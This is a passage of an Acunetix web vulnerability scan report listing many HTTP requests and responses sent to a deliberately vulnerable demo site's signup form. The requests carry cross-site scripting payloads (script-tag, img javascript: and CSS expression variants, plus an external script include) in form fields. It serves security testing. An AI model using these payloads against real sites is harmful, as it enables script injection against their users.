Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 342 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%2 8520175953713%29%3B%22%[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 356 Cookie: mycookie=3 Connection: Close Acunetix Website Audit

161

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=[email protected]&signup=s Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 367 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=[email protected] t&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 400 Cookie: mycookie=3 Acunetix Website Audit

162

Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=&uad Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 351 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

163

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=-->alert(519585953406 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 346 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=email@somealert(519595 953406)%3B[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 337 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

164

[email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=alert(5195 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 334 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=alert(51957595 3406)%3B[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=>'>alert(519545953406 Acunetix Website Audit

165

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=>">alert(519555953406) %3B[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 314 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=&ua [email protected]&signup=signup Response HTTP/1.1 200 OK Acunetix Website Audit

166

Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 326 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=alert(519535953406)%3B [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 349 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt: alert%28519615953406%29%3B%22%[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Acunetix Website Audit

167

Connection: close /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=%00"'>alert(5208359540 40)%3B[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 338 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=%3C/xss/*-*/style=xss:e/**/xpression(al ert(521425954370))%[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

168

/secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 324 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=[email protected][email protected]&uphone=111-222-1933email@add Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 337 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=alert(519665953406)%3B [email protected][email protected]&uphone=111-222-1 [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 338 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

173

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=%3C/xss/*-*/style=xss:e/**/xpression(alert(521525954425))%3 [email protected][email protected]&uphone=111-222Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=%00"'>alert(520935954095)%3B&ucc= [email protected][email protected]&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 357 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

174

[email protected][email protected][email protected]&urname="+src="http://testphp.acunetix.com/xss.js?520 885954095">[email protected]&uemail=111-222-1933email@address. [email protected][email protected]&signup= Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 350 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=[email protected][email protected]&uph [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 351 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

175

[email protected][email protected][email protected]&urname=[email protected][email protected]&u Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 334 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=alert(519675953406)%3B&uc [email protected][email protected]&uphone=111-222-1933 [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=%00'">alert(520925954095)%3B&ucc= [email protected][email protected]&uphone=111-222-1933em [email protected][email protected]&signup=signup Acunetix Website Audit

176

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=alert(520905954095)%3B&ucc= [email protected][email protected]&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 349 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28519715953406 %29%3B%22%[email protected][email protected]&upho [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Acunetix Website Audit

177

Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 356 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=[email protected][email protected] [email protected][email protected]&signup=si gnup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=>">alert(519655953406)%3B&ucc=111 [email protected][email protected]&uphone=111-222-1933email @[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Acunetix Website Audit

178

Content-Type: text/html Connection: close /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 367 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=[email protected]&uemail=111-222-1933emai [email protected][email protected][email protected] t&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 342 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28520275953766%29%3B% 22%[email protected][email protected][email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Acunetix Website Audit

179

Connection: close /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=>'>alert(519645953406)%3B&ucc=111 [email protected][email protected]&uphone=111-222-1933email @[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=&ucc= [email protected][email protected]&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

180

/secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 320 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=<%00script>alert(520235953766)%3B&ucc=111-222-1933 [email protected][email protected]&uphone=111-222-1933email@address. [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 326 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=alert(519635953406)%3B&ucc=111-22 